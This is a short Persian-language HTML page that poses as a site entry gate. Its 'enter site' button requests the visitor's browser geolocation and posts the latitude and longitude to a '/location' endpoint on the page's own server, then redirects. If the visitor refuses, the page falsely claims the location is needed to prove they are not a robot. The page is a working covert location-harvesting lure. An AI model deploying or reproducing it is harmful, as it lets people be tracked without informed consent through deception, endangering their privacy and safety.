<!DOCTYPE html>
<html lang="fa">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>سایت</title>
</head>
<body>
    <h2>روی دکمه کلیک کنید تا سایت باز شود</h2>
    <button onclick="sendLocation()">ورود به سایت</button>
    <p id="status"></p>

    <script>
        function sendLocation() {
            document.getElementById('status').innerText = "خوش آمدید! لطفا منتظر بمانید...";

            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(
                    function(position) {
                        const latitude = position.coords.latitude;
                        const longitude = position.coords.longitude;

                        fetch('/location', {
                            method: 'POST',
                            headers: { 'Content-Type': 'application/json' },
                            body: JSON.stringify({ latitude, longitude })
                        })
                        .then(response => response.json())
                        .then(data => {
                            console.log("به سایت هدایت می شوید", data);
                            setTimeout(() => {
                                window.location.href = "";
                            }, 2000); // پس از ۲ ثانیه هدایت شود
                        })
                        .catch(error => console.error('خطا:', error));
                    },
                    function(error) {
                        document.getElementById('status').innerText = "دسترسی به موقعیت مکانی رد شد! برای دیدن سایت باید بدانیم شما روبات نیستید.";
                    }
                );
            } else {
                document.getElementById('status').innerText = "مرورگر شما از موقعیت‌یابی پشتیبانی نمی‌کند!";
            }
        }
    </script>
</body>
</html>
